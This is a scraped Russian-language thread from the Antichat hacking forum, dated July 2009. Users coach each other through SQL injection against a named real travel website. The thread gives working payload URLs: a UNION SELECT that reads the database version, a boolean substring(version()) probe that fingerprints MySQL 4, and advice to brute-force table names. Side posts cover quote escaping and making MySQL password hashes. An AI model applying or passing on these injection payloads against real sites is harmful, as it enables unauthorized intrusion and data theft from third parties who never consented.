Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
19.07.2009, 10:05
|
|
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468
Репутация:
1224
|
|
Сообщение от Byrger
http://forum.antichat.ru/showpost.php?p=1389998&postcount=8135
Помогите по данному вопросу.
кавычка слэшируется просто?
INSERT INTO vote_result (ip, name, vote_id, answer) VALUES ('94.0.0.0', 'guest', '1', '0 \\\'')
|
|
|
19.07.2009, 12:22
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
Сообщение от it's my
кавычка слэшируется просто?
INSERT INTO vote_result (ip, name, vote_id, answer) VALUES ('94.0.0.0', 'guest', '1', '0\\\'')
да 3 слеша
|
|
|
|
20.07.2009, 00:20
|
|
Banned
Регистрация: 27.06.2009
Сообщений: 200
Провел на форуме:
944465
Репутация:
68
|
|
У меня вопрос. Я тут
http://www.bringitontours.com/package/index.php?destination_id=
Хотел заюзать уязвимость в БД, определил количество таблиц 3, но неполучаеться узнать их названия. Вот запрос
http://www.bringitontours.com/package/index.php?destination_id=1+union+select+table_sche ma,table_name,1,2,3+from+information_schema.tables .
Где ошибка? |
|
|
|
20.07.2009, 00:28
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418
Репутация:
386
|
|
2 +casper+
1) ты неправильно составил запрос ... должно было быть так
http://www.bringitontours.com/package/index.php?destination_id=-1+union+select+1,2,version()
2)там стоит 4 ветка соответсвено там нет information_schema |
|
|
|
20.07.2009, 00:32
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
В ДНК, 4-ая ветка потому что:
Код:
http://www.bringitontours.com/package/index.php?destination_id=1+and+substring(version(),1,1)=4
|
|
|
|
20.07.2009, 00:48
|
|
Banned
Регистрация: 27.06.2009
Сообщений: 200
Провел на форуме:
944465
Репутация:
68
|
|
А как мне правильно сформировать запрос что б глянуть названия всех таблиц?
|
|
|
|
20.07.2009, 00:57
|
|
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
Провел на форуме:
4205500
Репутация:
930
|
|
Только перебор. Сипт в подписи предыдущего дяди  |
|
|
|
20.07.2009, 12:09
|
|
Постоянный
Регистрация: 12.05.2009
Сообщений: 395
Провел на форуме:
4761503
Репутация:
229
|
|
Собственно есть пароль... Надо его преобразовать в mysql5 хеш, как это сделать?
|
|
|
|
20.07.2009, 12:14
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
http://www.insidepro.com/hashes.php
|
|
|
|
20.07.2009, 14:29
|
|
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544
Репутация:
412
|
|
MySQL>SELECT password( 'password' )
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
